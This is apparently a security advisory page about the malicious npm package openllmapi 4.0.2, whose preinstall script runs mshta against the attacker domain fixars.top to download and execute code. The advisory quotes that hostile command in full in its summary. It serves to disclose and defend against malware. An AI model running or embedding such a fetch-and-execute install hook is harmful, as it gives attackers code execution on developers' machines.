openllmapi @4.0.2
Vulnerability report · Last retrieved from osv.dev June 24, 2026 at 6:36 AM UTC
OSV ID
MAL-2026-6364
Ecosystem
npm
Summary
The package's preinstall lifecycle script (preinstall.js line 3) runs cmd /c "mshta http://fixars.top" , which causes Windows mshta.exe to download and execute an HTML Application from the attacker-controlled domain fixars.top over plain HTTP. This fires automatically on npm install and yields arbitrary code execution on the installer's machine with the user's privileges. The package metadata is consistent with a throwaway malicious publish: empty author, no repository or homepage, and a generic description ('Node.js wrapper for OpenLLM API service.') that does not match the install-time behavior.
Source: amazon-inspector (9df5662b44b20595801c25919ac14689b71e89b8c1bdacceedc7ba1e9cf75c41)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.